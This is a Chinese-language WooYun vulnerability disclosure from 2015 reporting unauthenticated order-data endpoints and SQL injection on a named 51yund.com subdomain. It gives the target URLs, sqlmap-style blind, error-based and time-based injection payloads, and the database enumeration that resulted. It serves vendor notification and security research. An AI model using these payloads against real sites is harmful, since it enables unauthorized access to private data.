当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-096815

漏洞标题:悦动圈某分站订单信息未授权访问+SQL注入(可跨库)

相关厂商:51yund.com

漏洞作者: Ton7BrEak

提交时间:2015-02-11 16:49

修复时间:2015-03-28 16:50

公开时间:2015-03-28 16:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-11: 细节已通知厂商并且等待厂商处理中
2015-02-12: 厂商已经确认,细节仅向厂商公开
2015-02-22: 细节向核心白帽子及相关领域专家公开
2015-03-04: 细节向普通白帽子公开
2015-03-14: 细节向实习白帽子公开
2015-03-28: 细节向公众公开

简要描述:

接着之前的漏洞继续深入~

详细说明:

1、未授权访问
http://car.51yund.com/mobile/get_all_nopay_order.php

001.jpg


http://car.51yund.com/mobile/get_all_pay_order.php

002.jpg


2、此站某处注入点,经过检测发现这个站没有做SQL注入防御,很多地方都可以爆出数据库信息。
http://car.51yund.com/mobile/order_info.php?order_id=2755

Place: GET
Parameter: order_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: order_id=2755 AND 1189=1189
    Vector: AND [INFERENCE]
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: order_id=2755 AND (SELECT 8189 FROM(SELECT COUNT(*),CONCAT(0x3a7669613a,(SELECT (CASE W
HEN (8189=8189) THEN 1 ELSE 0 END)),0x3a6f6b773a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTE
R_SETS GROUP BY x)a)
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMI
TER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: order_id=2755 AND SLEEP(5)
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])

漏洞证明:

一、数据库

available databases [14]:
[*] cacti
[*] information_schema
[*] mycar
[*] mycar_test
[*] mysql
[*] performance_schema
[*] question
[*] spilder_dianping
[*] sport
[*] sport_cms
[*] sport_test
[*] test
[*] xyy_db
[*] yd_sns


2、某个库的数据

Database: cacti
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| graph_templates_item      | 328     |
| graph_template_input_defs | 257     |
| data_input_data           | 243     |
| data_template_data_rra    | 224     |
| colors                    | 101     |
| data_template_rrd         | 77      |
| graph_template_input      | 77      |
| snmp_query_graph_rrd_sv   | 59      |
| data_template_data        | 56      |
| data_input_fields         | 46      |
| data_template             | 41      |
| graph_templates_graph     | 41      |
| snmp_query_graph_sv       | 40      |
| snmp_query_graph_rrd      | 39      |
| host_snmp_cache           | 36      |
| graph_templates           | 33      |
| snmp_query_graph          | 19      |
| user_auth_realm           | 18      |
| poller_item               | 17      |
| cdef_items                | 16      |
| data_local                | 15      |
| host_template_graph       | 14      |
| settings                  | 14      |
| host_template_snmp_query  | 13      |
| data_input                | 12      |
| user_log                  | 11      |
| rra_cf                    | 10      |
| graph_local               | 8       |
| snmp_query                | 8       |
| host_template             | 7       |
| cdef                      | 6       |
| rra                       | 5       |
| host_graph                | 4       |
| graph_templates_gprint    | 3       |
| host                      | 2       |
| host_snmp_query           | 2       |
| plugin_hooks              | 2       |
| user_auth                 | 2       |
| `version`                 | 1       |
| graph_tree                | 1       |
| graph_tree_items          | 1       |
| plugin_realms             | 1       |
| poller_reindex            | 1       |
| poller_time               | 1       |
+---------------------------+---------+

修复方案:

0.0

版权声明:转载请注明来源 Ton7BrEak@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-02-12 14:54

厂商回复:

程序员已被罚跪在键盘上敲代码~~

最新状态:

暂无